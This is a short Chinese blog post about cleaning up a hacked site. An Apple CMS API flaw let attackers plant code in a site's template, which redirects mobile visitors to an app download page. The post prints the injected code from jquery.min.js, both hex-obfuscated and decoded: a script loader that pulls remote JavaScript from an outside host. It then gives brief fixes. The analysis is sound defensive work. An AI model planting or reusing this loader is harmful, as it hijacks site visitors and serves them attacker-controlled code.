网站被挂马跳转劫持跳转到H APP下载页。 被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。 挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是 var head = document.getElementsByTagName(‘head’)[0];
var script = document.createElement(‘script’);
script[‘src’] = ‘
https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码 关闭后台采集API功能。或自定义API接口名字,
特别声明:☆ 本站所有资源仅供学习和研究之用,严禁用于任何商业目的。
☆ 我们仅提供资源下载,不包含安装、调试等技术支持服务。
☆ 所有内容均来源于网络,本站不对资源的完整性、可用性或安全性作出任何承诺。
☆ 请勿将本站资源用于任何违法违规行为,由此产生的后果由使用者自行承担。
☆ 若您不同意上述声明,请立即停止使用本站内容与服务。
☆ 涉及付费或赞助资源,请务必自行甄别并谨慎选择。
☆ 若有内容侵犯您的合法权益,请联系我们,我们将及时处理下架。
☆ 所有模板或源码需具备一定开发知识,新手建议选购官方正版服务。
评论0